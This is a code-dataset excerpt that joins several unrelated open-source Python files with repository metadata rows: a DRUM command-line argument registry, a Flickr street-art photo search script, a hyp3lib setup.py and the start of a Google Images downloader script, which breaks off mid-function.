type_callback = CMRunnerArgsRegistry._is_valid_dir
parser.add_argument(
"-cd",
ArgumentsOptions.CODE_DIR,
default=None,
required=True,
type=type_callback,
help=help_message,
)
@staticmethod
def _reg_arg_address(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.ADDRESS,
default=None,
required=True,
help="Prediction server address host[:port]. Default Flask port is: 5000. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.ADDRESS
),
)
@staticmethod
def _reg_arg_logging_level(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.LOGGING_LEVEL,
required=False,
choices=list(LOG_LEVELS.keys()),
default="warning",
help="Logging level to use",
)
@staticmethod
def _reg_arg_docker(*parsers):
for parser in parsers:
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
parser.add_argument(
ArgumentsOptions.DOCKER,
default=None,
required=False,
help="Docker image to use to run {} in the {} mode, "
"or a directory, containing a Dockerfile, which can be built into a docker image. "
"If code dir contains requirements.txt file, DRUM tries to install dependencies during image build. (Reflects the DR App behavior.) "
"Requirements installation is supported for Python/R models only. "
"Use {} to skip installation."
"Note: DRUM attempts to install dependencies only if docker context folder is provided, not already built image from the registry.".format(
ArgumentsOptions.MAIN_COMMAND,
prog_name_lst[1],
ArgumentsOptions.SKIP_DEPS_INSTALL,
),
)
@staticmethod
def _reg_arg_skip_deps_install(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.SKIP_DEPS_INSTALL,
default=False,
action="store_true",
required=False,
help="Skip dependencies installation during the image build. "
"If code dir contains requirements.txt file, DRUM tries to install dependencies during image build. (Reflects the DR App behavior.) "
"Provide this argument to skip dependencies installation.",
),
@staticmethod
def _reg_arg_memory(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.MEMORY,
default=None,
required=False,
help="Amount of memory to allow the docker container to consume. "
"The value will be passed to the docker run command to both the "
"--memory and --memory-swap parameters. b,k,m,g suffixes are supported",
),
@staticmethod
def _reg_arg_production_server(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.PRODUCTION,
action="store_true",
default=False,
help="Run prediction server in production mode uwsgi + nginx. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.PRODUCTION
),
)
@staticmethod
def _reg_arg_max_workers(*parsers):
def type_callback(arg):
ret_val = int(arg)
if ArgumentsOptions.PRODUCTION not in sys.argv:
raise argparse.ArgumentTypeError(
"can only be used in pair with {}".format(ArgumentsOptions.PRODUCTION)
)
if ret_val <= 0:
raise argparse.ArgumentTypeError("must be > 0")
return ret_val
for parser in parsers:
parser.add_argument(
ArgumentsOptions.MAX_WORKERS,
type=type_callback,
# default 0 is mapped into null in pipeline json
default=0,
help="Max number of uwsgi workers in server production mode. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.MAX_WORKERS
),
)
@staticmethod
def _reg_arg_show_perf(*parsers):
for parser in parsers:
parser.add_argument(
"--show-perf", action="store_true", default=False, help="Show performance stats"
)
@staticmethod
def _reg_arg_samples(*parsers):
for parser in parsers:
parser.add_argument("-s", "--samples", type=int, default=None, help="Number of samples")
@staticmethod
def _reg_arg_iterations(*parsers):
for parser in parsers:
parser.add_argument(
"-i", "--iterations", type=int, default=None, help="Number of iterations"
)
@staticmethod
def _reg_arg_timeout(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.TIMEOUT, type=int, default=600, help="Test case timeout"
)
@staticmethod
def _reg_arg_in_server(*parsers):
for parser in parsers:
parser.add_argument(
"--in-server",
action="store_true",
default=False,
help="Show performance inside server",
)
@staticmethod
def _reg_arg_url(*parsers):
for parser in parsers:
parser.add_argument(
"--url", default=None, help="Run performance against the given prediction server"
)
@staticmethod
def _reg_arg_language(*parsers):
for parser in parsers:
langs = [e.value for e in RunLanguage]
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
if prog_name_lst[1] == ArgumentsOptions.NEW:
langs.remove(RunLanguage.JAVA.value)
required_val = True
else:
required_val = False
parser.add_argument(
ArgumentsOptions.LANGUAGE,
choices=langs,
default=None,
required=required_val,
help="Language to use for the new model/env template to create",
)
@staticmethod
def _reg_arg_num_rows(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.NUM_ROWS,
default="ALL",
help="Number of rows to use for testing the fit functionality. "
"Set to ALL to use all rows. Default is 100",
)
@staticmethod
def _reg_arg_sparse_colfile(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.SPARSE_COLFILE,
default=None,
type=CMRunnerArgsRegistry._is_valid_file,
help="Drum ingests sparse data as .mtx files, which don't have support for column"
"names. We allow a second file which addresses this. Please do this by"
"specifying one column name per line in the file. The number of lines should "
"match the number of columns in your mtx file exactly. ",
)
@staticmethod
def _reg_arg_parameter_file(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.PARAMETER_FILE,
default=None,
type=CMRunnerArgsRegistry._is_valid_file,
help="Model parameters stored in a JSON file",
)
@staticmethod
def _reg_arg_with_error_server(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.WITH_ERROR_SERVER,
action="store_true",
default=False,
help="Start server even if pipeline initialization fails. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.WITH_ERROR_SERVER
),
)
@staticmethod
def _reg_arg_show_stacktrace(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.SHOW_STACKTRACE,
action="store_true",
default=False,
help="Show stacktrace when error happens. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.SHOW_STACKTRACE
),
)
@staticmethod
def _reg_args_monitoring(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.MONITOR,
action="store_true",
help="Monitor predictions using DataRobot MLOps. The argument can also be provided by setting {} env var. "
"Monitoring can not be used in unstructured mode.".format(
ArgumentOptionsEnvVars.MONITOR
),
)
parser.add_argument(
ArgumentsOptions.DEPLOYMENT_ID,
default=os.environ.get("DEPLOYMENT_ID", None),
help="Deployment id to use for monitoring model predictions (env: DEPLOYMENT_ID)",
)
parser.add_argument(
ArgumentsOptions.MODEL_ID,
default=os.environ.get("MODEL_ID", None),
help="MLOps model id to use for monitoring predictions (env: MODEL_ID)",
)
parser.add_argument(
ArgumentsOptions.MONITOR_SETTINGS,
default=os.environ.get("MONITOR_SETTINGS", None),
help="MLOps setting to use for connecting with the MLOps Agent (env: MONITOR_SETTINGS)",
)
@staticmethod
def _reg_args_deployment_config(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.DEPLOYMENT_CONFIG,
default=None,
type=CMRunnerArgsRegistry._is_valid_file,
help="Provide deployment configuration file to return prediction response in DR PPS format. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.DEPLOYMENT_CONFIG
),
)
# TODO: restrict params to be used with unstructured target type only
@staticmethod
def _reg_args_unstructured_mode(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.QUERY,
default=None,
help="Additional query params unstructured mode. (Simulates http request query params.)",
)
parser.add_argument(
ArgumentsOptions.CONTENT_TYPE,
default=None,
help="Additional content type for unstructured mode. "
"(Simulates http request Content-Type header, default: 'text/plain; charset=utf8')",
)
@staticmethod
def _reg_arg_target_type(*parsers):
target_types = [e for e in TargetType.ALL.value]
for parser in parsers:
parser.add_argument(
ArgumentsOptions.TARGET_TYPE,
required=False,
choices=target_types,
default=None,
help="Target type. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.TARGET_TYPE
),
)
@staticmethod
def _reg_arg_strict_validation(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.DISABLE_STRICT_VALIDATION,
action="store_true",
default=False,
help="Disable strict schema validation and only warn if issues are found.",
)
@staticmethod
def _register_subcommand_perf_test(subparsers):
desc = """
Test the performance of an inference model. This is done by internally using the server
sub command to serve the model. Then sending multiple requests to the server and
measuring the time it takes to complete each request.
The test is mixing several requests sizes. The idea is to get a coverage of several
sizes, from the smallest request containing only 1 row of data, up to the largest
request containing up to 50MB of data.
At the end of the test, a summary of the test will be displayed. For each request size,
the following fields will be shown:
size: size of the requests in bytes or Megabytes.
samples: number of samples this request size contained.
iters: number of times this request size was sent
min: minimum time measured for this request size (in seconds)
avg: average time of the this request size (in seconds)
max: maximum time measured for this request size (in seconds)
used: amount of memory used by drum at the end of this request size (MB)
container limit: if tests run in docker container, memory limit for it (MB)
total physical: total amount of physical memory avail on the current machine (MB)
"""
parser = subparsers.add_parser(
ArgumentsOptions.PERF_TEST,
description=desc,
help="Run performance tests",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.PERF_TEST] = parser
return parser
@staticmethod
def _register_subcommand_score(subparsers):
desc = """
Score an input file using the given model.
"""
parser = subparsers.add_parser(
ArgumentsOptions.SCORE, help="Run predictions in batch mode", description=desc
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.SCORE] = parser
return parser
@staticmethod
def _register_subcommand_fit(subparsers):
parser = subparsers.add_parser(ArgumentsOptions.FIT, help="Fit your model to your data")
CMRunnerArgsRegistry._parsers[ArgumentsOptions.FIT] = parser
return parser
@staticmethod
def _register_subcommand_validation(subparsers):
desc = """
You can validate the model on a set of various checks.
It is highly recommended to run these checks, as they are performed in DataRobot
before the model can be deployed.
List of checks:
* null values imputation: each feature of the provided dataset is set to missing
and fed to the model.
Example:
> drum validation --code-dir ~/user_code_dir/ --input 10k.csv
--positive-class-label yes --negative-class-label no
"""
parser = subparsers.add_parser(
ArgumentsOptions.VALIDATION,
help="Run validation checks against the model",
description=desc,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.VALIDATION] = parser
return parser
@staticmethod
def _register_subcommand_server(subparsers):
desc = """
Serve the given model using REST API. A web server will be started and will use
the {address} argument for the host and port to use.
The drum prediction server provides the following routes.
You may provide the environment variable URL_PREFIX.
Note that URLs must end with /.
A GET URL_PREFIX/ route, which checks if the server is alive.
Example: GET http://localhost:6789/
A POST URL_PREFIX/shutdown/ route, which shuts the server down.
Example: POST http://localhost:6789/shutdown/
A POST URL_PREFIX/predict/ route, which returns predictions on data.
Example: POST http://localhost:6789/predict/
For this /predict/ route, provide inference data
(for the model to make predictions) as form data with a key:value pair,
where: key = X and value = filename of the CSV that contains the inference data
Example using curl:
curl -X POST --form "X=@data_file.csv" localhost:6789/predict/
"""
parser = subparsers.add_parser(
ArgumentsOptions.SERVER,
help="serve the model via REST APIs",
description=desc,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.SERVER] = parser
return parser
@staticmethod
def _register_subcommand_new(subparsers):
parser = subparsers.add_parser(
ArgumentsOptions.NEW,
description="Create new model/env template",
help="Create new model/env template",
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.NEW] = parser
return parser
@staticmethod
def _register_subcommand_new_model(subparsers):
parser = subparsers.add_parser(
ArgumentsOptions.NEW_MODEL, help="Create a new modeling code directory template"
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.NEW_MODEL] = parser
return parser
@staticmethod
def _register_subcommand_push(subparsers):
parser = subparsers.add_parser(
ArgumentsOptions.PUSH,
help="Add your modeling code into DataRobot",
description=PUSH_HELP_TEXT,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
CMRunnerArgsRegistry._parsers[ArgumentsOptions.PUSH] = parser
return parser
@staticmethod
def get_arg_parser():
parser = argparse.ArgumentParser(description="Run user model")
CMRunnerArgsRegistry._parsers[ArgumentsOptions.MAIN_COMMAND] = parser
CMRunnerArgsRegistry._reg_arg_version(parser)
subparsers = parser.add_subparsers(
dest=CMRunnerArgsRegistry.SUBPARSER_DEST_KEYWORD, help="Commands"
)
score_parser = CMRunnerArgsRegistry._register_subcommand_score(subparsers)
fit_parser = CMRunnerArgsRegistry._register_subcommand_fit(subparsers)
perf_test_parser = CMRunnerArgsRegistry._register_subcommand_perf_test(subparsers)
validation_parser = CMRunnerArgsRegistry._register_subcommand_validation(subparsers)
server_parser = CMRunnerArgsRegistry._register_subcommand_server(subparsers)
new_parser = CMRunnerArgsRegistry._register_subcommand_new(subparsers)
new_subparsers = new_parser.add_subparsers(
dest=CMRunnerArgsRegistry.NEW_SUBPARSER_DEST_KEYWORD, help="Commands"
)
new_model_parser = CMRunnerArgsRegistry._register_subcommand_new_model(new_subparsers)
push_parser = CMRunnerArgsRegistry._register_subcommand_push(subparsers)
# Note following args are not supported for perf-test, thus set as default
perf_test_parser.set_defaults(logging_level="warning", verbose=False)
validation_parser.set_defaults(logging_level="warning", verbose=False)
CMRunnerArgsRegistry._reg_arg_code_dir(
score_parser,
perf_test_parser,
server_parser,
fit_parser,
new_model_parser,
validation_parser,
push_parser,
)
CMRunnerArgsRegistry._reg_arg_verbose(
score_parser,
server_parser,
fit_parser,
new_parser,
new_model_parser,
push_parser,
perf_test_parser,
)
CMRunnerArgsRegistry._reg_arg_input(
score_parser, perf_test_parser, fit_parser, validation_parser
)
CMRunnerArgsRegistry._reg_arg_pos_neg_labels(
score_parser, perf_test_parser, server_parser, fit_parser, validation_parser,
)
CMRunnerArgsRegistry._reg_arg_multiclass_labels(
score_parser, perf_test_parser, server_parser, fit_parser, validation_parser,
)
CMRunnerArgsRegistry._reg_arg_logging_level(
score_parser, server_parser, fit_parser, new_parser, new_model_parser, push_parser
)
CMRunnerArgsRegistry._reg_arg_docker(
score_parser,
perf_test_parser,
server_parser,
fit_parser,
validation_parser,
push_parser,
)
CMRunnerArgsRegistry._reg_arg_skip_deps_install(
score_parser,
perf_test_parser,
server_parser,
fit_parser,
validation_parser,
push_parser,
)
CMRunnerArgsRegistry._reg_arg_memory(
score_parser,
perf_test_parser,
server_parser,
fit_parser,
validation_parser,
push_parser,
)
CMRunnerArgsRegistry._reg_arg_output(score_parser, fit_parser)
CMRunnerArgsRegistry._reg_arg_show_perf(score_parser, server_parser)
CMRunnerArgsRegistry._reg_arg_target_feature_and_filename(fit_parser)
CMRunnerArgsRegistry._reg_arg_weights(fit_parser)
CMRunnerArgsRegistry._reg_arg_skip_predict(fit_parser)
CMRunnerArgsRegistry._reg_arg_num_rows(fit_parser)
CMRunnerArgsRegistry._reg_arg_sparse_colfile(fit_parser)
CMRunnerArgsRegistry._reg_arg_parameter_file(fit_parser)
CMRunnerArgsRegistry._reg_arg_samples(perf_test_parser)
CMRunnerArgsRegistry._reg_arg_iterations(perf_test_parser)
CMRunnerArgsRegistry._reg_arg_timeout(perf_test_parser)
CMRunnerArgsRegistry._reg_arg_in_server(perf_test_parser)
CMRunnerArgsRegistry._reg_arg_url(perf_test_parser)
CMRunnerArgsRegistry._reg_arg_address(server_parser)
CMRunnerArgsRegistry._reg_arg_production_server(server_parser, perf_test_parser)
CMRunnerArgsRegistry._reg_arg_max_workers(server_parser, perf_test_parser)
CMRunnerArgsRegistry._reg_arg_with_error_server(server_parser)
CMRunnerArgsRegistry._reg_arg_language(
new_model_parser, server_parser, score_parser, perf_test_parser, validation_parser
)
CMRunnerArgsRegistry._reg_arg_show_stacktrace(
score_parser,
perf_test_parser,
server_parser,
fit_parser,
validation_parser,
new_model_parser,
)
CMRunnerArgsRegistry._reg_args_monitoring(score_parser, server_parser)
CMRunnerArgsRegistry._reg_arg_target_type(
score_parser, perf_test_parser, server_parser, fit_parser, validation_parser
)
CMRunnerArgsRegistry._reg_args_unstructured_mode(
score_parser, perf_test_parser, server_parser, validation_parser
)
CMRunnerArgsRegistry._reg_args_deployment_config(server_parser)
CMRunnerArgsRegistry._reg_arg_strict_validation(fit_parser, push_parser)
return parser
@staticmethod
def verify_monitoring_options(options, parser_name):
if options.subparser_name in [ArgumentsOptions.SERVER, ArgumentsOptions.SCORE]:
if options.monitor:
if options.target_type == TargetType.UNSTRUCTURED.value:
print("Error: MLOps monitoring can not be used in unstructured mode.")
exit(1)
missing_args = []
if options.model_id is None:
missing_args.append(ArgumentsOptions.MODEL_ID)
if options.deployment_id is None:
missing_args.append(ArgumentsOptions.DEPLOYMENT_ID)
if options.monitor_settings is None:
missing_args.append(ArgumentsOptions.MONITOR_SETTINGS)
if len(missing_args) > 0:
print("\n")
print("Error: MLOps Monitoring requires all monitoring options to be present.")
print("Note: The following MLOps monitoring option(s) is/are missing:")
for arg in missing_args:
print(" {}".format(arg))
print("\n")
print("These options can also be obtained via environment variables")
print("\n")
CMRunnerArgsRegistry._parsers[parser_name].print_help()
exit(1)
# Monitor options are used to fill in pipeline json,
# so define them for the modes different from score and server
else:
options.monitor = False
options.model_id = None
options.deployment_id = None
options.monitor_settings = None
@staticmethod
def verify_options(options):
if not options.subparser_name:
CMRunnerArgsRegistry._parsers[ArgumentsOptions.MAIN_COMMAND].print_help()
exit(1)
elif options.subparser_name == ArgumentsOptions.NEW:
if not options.new_mode:
CMRunnerArgsRegistry._parsers[ArgumentsOptions.NEW].print_help()
exit(1)
elif options.subparser_name in [ArgumentsOptions.SERVER, ArgumentsOptions.PERF_TEST]:
if (
options.subparser_name == ArgumentsOptions.PERF_TEST
and options.target_type == TargetType.UNSTRUCTURED.value
):
print("Performance testing is not implemented for unstructured models.")
exit(1)
if options.production:
if options.verbose:
print("Checking if uwsgi is installed...")
result = subprocess.run(
[sys.executable, "-m", "pip", "show", "uwsgi"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
if result.returncode != 0:
print(
"Looks like 'uwsgi` package is missing. Don't use '{}' option when running drum server or try to install 'uwsgi'.".format(
ArgumentsOptions.PRODUCTION
)
)
print(result.stdout.decode("utf8"))
print(result.stderr.decode("utf8"))
exit(1)
else:
if options.verbose:
print("uwsgi detected")
elif options.subparser_name in [ArgumentsOptions.FIT]:
if options.target_type == TargetType.ANOMALY.value:
if any([options.target, options.target_csv]):
print(
"Arguments '{}' and '{}' are mutually exclusive with '{}' target type.".format(
ArgumentsOptions.TARGET,
ArgumentsOptions.TARGET_CSV,
options.target_type,
)
)
exit(1)
elif options.target_type != TargetType.TRANSFORM.value:
if not any([options.target, options.target_csv]):
print(
"With target type '{}', target feature has to be provided using '{}' or '{}' argument.".format(
options.target_type,
ArgumentsOptions.TARGET,
ArgumentsOptions.TARGET_CSV,
)
)
exit(1)
if getattr(options, "skip_deps_install", False) and options.docker is None:
print(
"Argument '{}' can only be used together with '{}'.".format(
ArgumentsOptions.SKIP_DEPS_INSTALL, ArgumentsOptions.DOCKER,
)
)
exit(1)
CMRunnerArgsRegistry.verify_monitoring_options(options, options.subparser_name)
| 40.861083 | 175 | 0.600555 |
94662ee45ece09b53c05d98459182de6da3e028b | 1,422 | py | Python | getgraffitiphotos.py | ryubidragonfire/bristol-streetart | ff7b1cdccdbd579e646ccc3e7dde0236775ed1b1 | [
"MIT"
] | null | null | null | getgraffitiphotos.py | ryubidragonfire/bristol-streetart | ff7b1cdccdbd579e646ccc3e7dde0236775ed1b1 | [
"MIT"
] | null | null | null | getgraffitiphotos.py | ryubidragonfire/bristol-streetart | ff7b1cdccdbd579e646ccc3e7dde0236775ed1b1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 8 13:05:03 2016
@author: chyam
"""
import flickr_api
from flickr_api.api import flickr
import json
def main():
# credentials to access flickr api
initialise()
photos_xml = flickr.photos.search(tags='street art', lat=51.452705, lon=-2.595146, radius=0.6, radius_units='km', extras='geo, url_l')
photos_json = xmltojson(photos_xml)
photo = photos_json['rsp']['photos']['photo']
d={}
dlist=[]
for p in photo:
d['id'] = p['@id']
d['lon'] = p['@longitude']
d['lat'] = p['@latitude']
d['url'] = p['@url_l']
dlist.append(d.copy())
#dlist_json = json.dumps(dlist)
with open('./photos_list.json', 'w') as f:
json.dump(dlist, f, sort_keys = True)
return
def xmltojson(xml_string, xml_attribs=True):
import json
import xmltodict
d = xmltodict.parse(xml_string, xml_attribs=xml_attribs)
return json.loads(json.dumps(d, indent=4))
def initialise():
from ConfigParser import SafeConfigParser
parser = SafeConfigParser()
parser.read('config.ini')
API_KEY = parser.get('credential', 'API_KEY');
API_SECRET = parser.get('credential', 'API_SECRET')
flickr_api.set_keys(api_key = API_KEY, api_secret = API_SECRET )
return
if __name__ == '__main__':
main()
| 26.333333 | 139 | 0.59775 |
2f1b86c72b0c75942e925713888a1e8e6452a2f6 | 3,946 | py | Python | setup.py | lidar-nevermore/hyp3-lib | bfb2487b6cbc0029eb689bc059890e71b7f60d3c | [
"BSD-3-Clause"
] | null | null | null | setup.py | lidar-nevermore/hyp3-lib | bfb2487b6cbc0029eb689bc059890e71b7f60d3c | [
"BSD-3-Clause"
] | null | null | null | setup.py | lidar-nevermore/hyp3-lib | bfb2487b6cbc0029eb689bc059890e71b7f60d3c | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
from setuptools import find_packages, setup
readme = Path(__file__).parent / 'README.md'
setup(
name='hyp3lib',
use_scm_version=True,
description='Common library for HyP3 plugins',
long_description=readme.read_text(),
long_description_content_type='text/markdown',
url='https://github.com/ASFHyP3/hyp3-lib',
author='ASF APD/Tools Team',
author_email='uaf-asf-apd@alaska.edu',
license='BSD',
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Topic :: Software Development :: Libraries',
],
python_requires='>=3.7',
install_requires=[
'boto3',
'gdal',
'imageio',
'importlib_metadata',
'lxml',
'matplotlib',
'netCDF4',
'numpy',
'pillow',
'pyproj>=2',
'pyshp',
'requests',
'scipy',
'six',
'statsmodels',
'urllib3',
],
extras_require={
'develop': [
'botocore',
'flake8',
'flake8-import-order',
'flake8-blind-except',
'flake8-builtins',
'pytest',
'pytest-cov',
'pytest-console-scripts',
'responses',
]
},
packages=find_packages(),
# FIXME: this could/should be converted to python so it can be registered as an entrypoint
scripts=['scripts/GC_map_mod'],
entry_points={'console_scripts': [
'apply_wb_mask.py = hyp3lib.apply_wb_mask:main',
'byteSigmaScale.py = hyp3lib.byteSigmaScale:main',
'copy_metadata.py = hyp3lib.copy_metadata:main',
'createAmp.py = hyp3lib.createAmp:main',
'cutGeotiffsByLine.py = hyp3lib.cutGeotiffsByLine:main',
'cutGeotiffs.py = hyp3lib.cutGeotiffs:main',
'draw_polygon_on_raster.py = hyp3lib.draw_polygon_on_raster:main',
'dem2isce.py = hyp3lib.dem2isce:main',
'enh_lee_filter.py = hyp3lib.enh_lee_filter:main',
'extendDateline.py = hyp3lib.extendDateline:main',
'geotiff_lut.py = hyp3lib.geotiff_lut:main',
'get_bounding.py = hyp3lib.get_bounding:main',
'getDemFor.py = hyp3lib.getDemFor:main',
'get_asf.py = hyp3lib.get_asf:main',
'get_dem.py = hyp3lib.get_dem:main',
'get_orb.py = hyp3lib.get_orb:main',
'iscegeo2geotif.py = hyp3lib.iscegeo2geotif:main',
'make_arc_thumb.py = hyp3lib.make_arc_thumb:main',
'makeAsfBrowse.py = hyp3lib.makeAsfBrowse:main',
'makeChangeBrowse.py = hyp3lib.makeChangeBrowse:main',
'make_cogs.py = hyp3lib.make_cogs:main',
'makeColorPhase.py = hyp3lib.makeColorPhase:main',
'makeKml.py = hyp3lib.makeKml:main',
'offset_xml.py = hyp3lib.offset_xml:main',
'ps2dem.py = hyp3lib.ps2dem:main',
'raster_boundary2shape.py = hyp3lib.raster_boundary2shape:main',
'rasterMask.py = hyp3lib.rasterMask:main',
'resample_geotiff.py = hyp3lib.resample_geotiff:main',
'rtc2colordiff.py = hyp3lib.rtc2colordiff:main',
'rtc2color.py = hyp3lib.rtc2color:main',
'simplify_shapefile.py = hyp3lib.simplify_shapefile:main',
'SLC_copy_S1_fullSW.py = hyp3lib.SLC_copy_S1_fullSW:main',
'subset_geotiff_shape.py = hyp3lib.subset_geotiff_shape:main',
'tileList2shape.py = hyp3lib.tileList2shape:main',
'utm2dem.py = hyp3lib.utm2dem:main',
'verify_opod.py = hyp3lib.verify_opod:main',
]
},
zip_safe=False,
)
| 33.726496 | 94 | 0.618094 |
0c05845a6e8eebf83715ab103db202126d61bd89 | 36,827 | py | Python | google_images_download/google_images_download.py | vflanker/google-images-crawler | f6981497cce945fca116dab43a9e632f2cbe95d3 | [
"MIT"
] | null | null | null | google_images_download/google_images_download.py | vflanker/google-images-crawler | f6981497cce945fca116dab43a9e632f2cbe95d3 | [
"MIT"
] | null | null | null | google_images_download/google_images_download.py | vflanker/google-images-crawler | f6981497cce945fca116dab43a9e632f2cbe95d3 | [
"MIT"
] | null | null | null | # In[ ]:
# coding: utf-8
###### Searching and Downloading Google Images to the local disk ######
# Import Libraries
import sys
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
import urllib.request
from urllib.request import Request, urlopen
from urllib.request import URLError, HTTPError
from urllib.parse import quote
import html
else: # If the Current Version of Python is 2.x
import urllib2
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
from urllib import quote
import time # Importing the time library to check the time of code execution
import os
import argparse
import ssl
import datetime
import json
import re
import codecs
config = argparse.ArgumentParser()
config.add_argument('-cf', '--config_file', help='config file name', default='', type=str, required=False)
config_file_check = config.parse_known_args()
object_check = vars(config_file_check[0])
if object_check['config_file'] != '':
args_list = ["keywords","keywords_from_file","suffix_keywords","prefix_keywords","limit","format","url","single_image","output_directory","delay","color","color_type","usage_rights","size","type","time","time_range","aspect_ratio","similar_images","specific_site","print_urls","print_size","metadata","extract_metadata","socket_timeout","thumbnail","language","prefix","proxy","related_images"]
records = []
json_file = json.load(open(config_file_check[0].config_file))
for record in range(0,len(json_file['Records'])):
arguments = {}
for i in args_list:
arguments[i] = None
for key, value in json_file['Records'][record].items():
arguments[key] = value
records.append(arguments)
records_count = len(records)
else:
# Taking command line arguments from users
parser = argparse.ArgumentParser()
parser.add_argument('-k', '--keywords', help='delimited list input', type=str, required=False)
parser.add_argument('-kf', '--keywords_from_file', help='extract list of keywords from a text file', type=str, required=False)
parser.add_argument('-sk', '--suffix_keywords', help='comma separated additional words added after to main keyword', type=str, required=False)
parser.add_argument('-pk', '--prefix_keywords', help='comma separated additional words added before main keyword', type=str, required=False)
parser.add_argument('-l', '--limit', help='delimited list input', type=str, required=False)
parser.add_argument('-f', '--format', help='download images with specific format', type=str, required=False,
choices=['jpg', 'gif', 'png', 'bmp', 'svg', 'webp', 'ico'])
parser.add_argument('-u', '--url', help='search with google image URL', type=str, required=False)
parser.add_argument('-x', '--single_image', help='downloading a single image from URL', type=str, required=False)
parser.add_argument('-o', '--output_directory', help='download images in a specific directory', type=str, required=False)
parser.add_argument('-d', '--delay', help='delay in seconds to wait between downloading two images', type=str, required=False)
parser.add_argument('-c', '--color', help='filter on color', type=str, required=False,
choices=['red', 'orange', 'yellow', 'green', 'teal', 'blue', 'purple', 'pink', 'white', 'gray', 'black', 'brown'])
parser.add_argument('-ct', '--color_type', help='filter on color', type=str, required=False,
choices=['full-color', 'black-and-white', 'transparent'])
parser.add_argument('-r', '--usage_rights', help='usage rights', type=str, required=False,
choices=['labeled-for-reuse-with-modifications','labeled-for-reuse','labeled-for-noncommercial-reuse-with-modification','labeled-for-nocommercial-reuse'])
parser.add_argument('-s', '--size', help='image size', type=str, required=False,
choices=['large','medium','icon','>400*300','>640*480','>800*600','>1024*768','>2MP','>4MP','>6MP','>8MP','>10MP','>12MP','>15MP','>20MP','>40MP','>70MP'])
parser.add_argument('-t', '--type', help='image type', type=str, required=False,
choices=['face','photo','clip-art','line-drawing','animated'])
parser.add_argument('-w', '--time', help='image age', type=str, required=False,
choices=['past-24-hours','past-7-days'])
parser.add_argument('-wr', '--time_range', help='time range for the age of the image. should be in the format {"time_min":"MM/DD/YYYY","time_max":"MM/DD/YYYY"}', type=str, required=False)
parser.add_argument('-a', '--aspect_ratio', help='comma separated additional words added to keywords', type=str, required=False,
choices=['tall', 'square', 'wide', 'panoramic'])
parser.add_argument('-si', '--similar_images', help='downloads images very similar to the image URL you provide', type=str, required=False)
parser.add_argument('-ss', '--specific_site', help='downloads images that are indexed from a specific website', type=str, required=False)
parser.add_argument('-p', '--print_urls', default=False, help="Print the URLs of the images", action="store_true")
parser.add_argument('-ps', '--print_size', default=False, help="Print the size of the images on disk", action="store_true")
parser.add_argument('-m', '--metadata', default=False, help="Print the metadata of the image", action="store_true")
parser.add_argument('-e', '--extract_metadata', default=False, help="Dumps all the logs into a text file", action="store_true")
parser.add_argument('-st', '--socket_timeout', default=False, help="Connection timeout waiting for the image to download", type=float)
parser.add_argument('-th', '--thumbnail', default=False, help="Downloads image thumbnail along with the actual image", action="store_true")
parser.add_argument('-la', '--language', default=False, help="Defines the language filter. The search results are automatically returned in that language", type=str, required=False,
choices=['Arabic','Chinese (Simplified)','Chinese (Traditional)','Czech','Danish','Dutch','English','Estonian','Finnish','French','German','Greek','Hebrew','Hungarian','Icelandic','Italian','Japanese','Korean','Latvian','Lithuanian','Norwegian','Portuguese','Polish','Romanian','Russian','Spanish','Swedish','Turkish'])
parser.add_argument('-pr', '--prefix', default=False, help="A word that you would want to prefix in front of each image name", type=str, required=False)
parser.add_argument('-px', '--proxy', help='specify a proxy address and port', type=str, required=False)
parser.add_argument('-cd', '--chromedriver', help='specify the path to chromedriver executable in your local machine', type=str, required=False)
parser.add_argument('-ri', '--related_images', default=False, help="Downloads images that are similar to the keyword provided", action="store_true")
args = parser.parse_args()
arguments = vars(args)
records = []
records.append(arguments)
records_count = len(records)
# Downloading entire Web Document (Raw Page Content)
def download_page(url):
version = (3, 0)
cur_version = sys.version_info
